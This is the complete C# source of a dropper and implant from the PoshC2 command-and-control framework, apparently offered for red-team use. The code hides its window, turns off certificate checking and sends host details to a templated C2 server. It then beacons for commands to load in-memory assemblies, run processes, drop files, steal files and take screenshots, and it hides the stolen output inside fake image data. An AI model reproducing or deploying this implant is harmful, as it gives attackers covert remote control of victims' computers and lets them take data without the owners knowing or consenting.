PoshC2_Python/Files/dropper.cs

526 lines
17 KiB
C#

using System;
using System.Linq;
using System.Net;
using System.Text;
using System.Text.RegularExpressions;
using System.Reflection;
using System.Threading;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
using System.Collections.Generic;
public class Program
{
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0;
public const int SW_SHOW = 5;
public static void Sharp()
{
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates();
try { primer(); } catch {
var mre = new System.Threading.ManualResetEvent(false);
mre.WaitOne(300000);
try { primer(); } catch {
mre.WaitOne(600000);
try { primer(); } catch { }
}
}
}
public static void Main()
{
Sharp();
}
static byte[] Combine(byte[] first, byte[] second)
{
byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
return ret;
}
static System.Net.WebClient GetWebRequest(string cookie)
{
var x = new System.Net.WebClient();
var purl = @"#REPLACEPROXYURL#";
var puser = @"#REPLACEPROXYUSER#";
var ppass = @"#REPLACEPROXYPASSWORD#";
if (!String.IsNullOrEmpty(purl))
{
WebProxy proxy = new WebProxy();
proxy.Address = new Uri(purl);
proxy.Credentials = new NetworkCredential(puser, ppass);
proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
} else {
if (null != x.Proxy)
x.Proxy.Credentials = CredentialCache.DefaultCredentials;
}
var df = "#REPLACEDF#";
if (!String.IsNullOrEmpty(df))
x.Headers.Add("Host", df);
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
x.Headers.Add("Referrer", "#REPLACEREFERER#");
if (null != cookie)
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
return x;
}
static string Decryption(string key, string enc)
{
var b = System.Convert.FromBase64String(enc);
var IV = new Byte[16];
Array.Copy(b, IV, 16);
try
{
var a = CreateCam(key, System.Convert.ToBase64String(IV));
var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
catch
{
var a = CreateCam(key, System.Convert.ToBase64String(IV), false);
var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
finally
{
Array.Clear(b, 0, b.Length);
Array.Clear(IV, 0, 16);
}
}
static bool IsHighIntegrity()
{
System.Security.Principal.WindowsIdentity identity = System.Security.Principal.WindowsIdentity.GetCurrent();
System.Security.Principal.WindowsPrincipal principal = new System.Security.Principal.WindowsPrincipal(identity);
return principal.IsInRole(System.Security.Principal.WindowsBuiltInRole.Administrator);
}
static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
{
byte[] byEnc = null;
if (unByte != null)
byEnc = unByte;
else
byEnc = System.Text.Encoding.UTF8.GetBytes(un);
if (comp)
byEnc = Compress(byEnc);
try
{
var a = CreateCam(key, null);
var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
return System.Convert.ToBase64String(Combine(a.IV, f));
}
catch
{
var a = CreateCam(key, null, false);
var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
return System.Convert.ToBase64String(Combine(a.IV, f));
}
}
static System.Security.Cryptography.SymmetricAlgorithm CreateCam(string key, string IV, bool rij = true)
{
System.Security.Cryptography.SymmetricAlgorithm a = null;
if (rij)
a = new System.Security.Cryptography.RijndaelManaged();
else
a = new System.Security.Cryptography.AesCryptoServiceProvider();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
if (null != IV)
a.IV = System.Convert.FromBase64String(IV);
else
a.GenerateIV();
if (null != key)
a.Key = System.Convert.FromBase64String(key);
return a;
}
static void AllowUntrustedCertificates()
{
try
{
System.Net.ServicePointManager.ServerCertificateValidationCallback = (z, y, x, w) => { return true; };
}
catch { }
}
static void primer()
{
if (Convert.ToDateTime("#REPLACEKILLDATE#") > DateTime.Now)
{
var u = "";
try
{
u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
} catch {
u = System.Environment.UserName;
}
if (IsHighIntegrity())
u += "*";
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
var x = Decryption(key, primer);
var re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
var m = re.Match(x);
string RandomURI = m.Groups[1].ToString();
re = new Regex("URLS10484390243(.*)34209348401SLRU");
m = re.Match(x);
string URLS = m.Groups[1].ToString();
re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
m = re.Match(x);
var KillDate = m.Groups[1].ToString();
re = new Regex("SLEEP98001(.*)10089PEELS");
m = re.Match(x);
var Sleep = m.Groups[1].ToString();
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
m = re.Match(x);
var NewKey = m.Groups[1].ToString();
re = new Regex("IMGS19459394(.*)49395491SGMI");
m = re.Match(x);
var IMGs = m.Groups[1].ToString();
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
}
}
static byte[] Compress(byte[] raw)
{
using (MemoryStream memory = new MemoryStream())
{
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
{
gzip.Write(raw, 0, raw.Length);
}
return memory.ToArray();
}
}
static Type LoadSomething(string assemblyQualifiedName)
{
return Type.GetType(assemblyQualifiedName, (name) =>
{
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
}, null, true);
}
static string RunAssembly(string c)
{
var splitargs = c.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
int i = 0;
string sOut = null;
bool runexe = true;
string sMethod = "", splittheseargs = "", qualifiedname = "", name = "";
foreach (var a in splitargs)
{
if (i == 1)
qualifiedname = a;
if (i == 2)
name = a;
if (c.ToLower().StartsWith("run-exe")) {
if (i > 2)
splittheseargs = splittheseargs + " " + a;
} else {
if (i == 3)
sMethod = a;
else if (i > 3)
splittheseargs = splittheseargs + " " + a;
}
i++;
}
var splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try
{
if (c.ToLower().StartsWith("run-exe"))
sOut = loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString();
else
{
try
{
sOut = loadedType.Assembly.GetType(qualifiedname).InvokeMember(sMethod, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString();
}
catch
{
var asOut = loadedType.Assembly.GetType(qualifiedname).InvokeMember(sMethod, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null).ToString();
}
}
}
catch { }
}
}
return sOut;
}
static int Parse_Beacon_Time(string time, string unit)
{
int beacontime = Int32.Parse(time);
switch (unit)
{
case "h":
beacontime *= 3600;
break;
case "m":
beacontime *= 60;
break;
}
return beacontime;
}
internal static class UrlGen
{
static List<String> _stringnewURLS = new List<String>();
static String _randomURI;
static String _baseUrl;
static Random _rnd = new Random();
static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
internal static void Init(string stringURLS, String RandomURI, String baseUrl)
{
_stringnewURLS = _re.Matches(stringURLS.Replace(",", "").Replace(" ", "")).Cast<Match>().Select(m => m.Value).Where(m => !string.IsNullOrEmpty(m)).ToList();
_randomURI = RandomURI;
_baseUrl = baseUrl;
}
internal static String GenerateUrl()
{
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
}
}
internal static class ImgGen
{
static Random _rnd = new Random();
static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
static List<String> _newImgs = new List<String>();
internal static void Init(String stringIMGS)
{
var stringnewIMGS = _re.Matches(stringIMGS.Replace(",", "")).Cast<Match>().Select(m => m.Value);
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m));
_newImgs = stringnewIMGS.ToList();
}
static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[_rnd.Next(s.Length)]).ToArray());
}
internal static byte[] GetImgData(byte[] cmdoutput)
{
Int32 maxByteslen = 1500, maxDatalen = cmdoutput.Length + maxByteslen;
var randimg = _newImgs[(new Random()).Next(0, _newImgs.Count)];
var imgBytes = System.Convert.FromBase64String(randimg);
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(maxByteslen - imgBytes.Length)));
var ImageBytesFull = new byte[maxDatalen];
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return ImageBytesFull;
}
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
UrlGen.Init(stringURLS, RandomURI, baseURL);
ImgGen.Init(stringIMGS);
int beacontime = 5;
var ibcnRgx = new Regex(@"(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var imch = ibcnRgx.Match(Sleep);
if (imch.Success)
{
beacontime = Parse_Beacon_Time(imch.Groups["t"].Value, imch.Groups["u"].Value);
}
var strOutput = new StringWriter();
Console.SetOut(strOutput);
var exitvt = new ManualResetEvent(false);
var output = new StringBuilder();
while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95))))
{
if (Convert.ToDateTime(KillDate) < DateTime.Now)
{
exitvt.Set();
continue;
}
output.Length = 0;
try
{
String x = "", cmd = null;
try
{
cmd = GetWebRequest(null).DownloadString(UrlGen.GenerateUrl());
x = Decryption(Key, cmd).Replace("\0", string.Empty);
}
catch
{
continue;
}
if (x.ToLower().StartsWith("multicmd"))
{
var splitcmd = x.Replace("multicmd", "");
var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
var taskId = c.Substring(0, 5);
cmd = c.Substring(5, c.Length - 5);
if (cmd.ToLower().StartsWith("exit"))
{
exitvt.Set();
break;
}
else if (cmd.ToLower().StartsWith("loadmodule"))
{
var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase);
var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
}
else if (cmd.ToLower().StartsWith("upload-file"))
{
var path = Regex.Replace(cmd, "upload-file", "", RegexOptions.IgnoreCase);
var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
var fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
}
else if (cmd.ToLower().StartsWith("download-file"))
{
var path = Regex.Replace(cmd, "download-file ", "", RegexOptions.IgnoreCase);
var file = File.ReadAllBytes(path.Replace("\"", ""));
var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
var eTaskId = Encryption(Key, taskId);
var dcoutput = Encryption(Key, "", true, fileChuck);
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes);
continue;
}
else if (cmd.ToLower().StartsWith("get-screenshotmulti"))
{
bool sShot = true;
int sShotCount = 1;
while(sShot) {
var sHot = RunAssembly("run-exe Core.Program Core get-screenshot");
var eTaskId = Encryption(Key, taskId);
var dcoutput = Encryption(Key, strOutput.ToString(), true);
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes);
Thread.Sleep(240000);
sShotCount++;
if (sShotCount > 100) {
sShot = false;
var sbc = strOutput.GetStringBuilder();
sbc.Remove(0, sbc.Length);
output.Append("[+] Multi Screenshot Ran Sucessfully");
}
}
continue;
}
else if (cmd.ToLower().StartsWith("listmodules"))
{
var appd = AppDomain.CurrentDomain.GetAssemblies();
output.AppendLine("[+] Modules loaded:").AppendLine("");
foreach (var ass in appd)
output.AppendLine(ass.FullName.ToString());
}
else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe"))
{
output.AppendLine(RunAssembly(cmd));
}
else if (cmd.ToLower().StartsWith("start-process"))
{
var proc = cmd.Replace("'", "").Replace("\"", "");
var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
var p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = p.StartInfo.RedirectStandardError = p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd());
p.WaitForExit();
}
else if (cmd.ToLower().StartsWith("setbeacon") || cmd.ToLower().StartsWith("beacon"))
{
var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var mch = bcnRgx.Match(c);
if (mch.Success)
{
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
}
else
output.AppendLine($@"[X] Invalid time ""{c}""");
}
output.AppendLine(strOutput.ToString());
var sb = strOutput.GetStringBuilder();
sb.Remove(0, sb.Length);
var enTaskId = Encryption(Key, taskId);
var coutput = Encryption(Key, output.ToString(), true);
var outputBytes = System.Convert.FromBase64String(coutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(enTaskId).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
catch (Exception e)
{
var task = Encryption(Key, "Error");
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
var outputBytes = System.Convert.FromBase64String(eroutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
}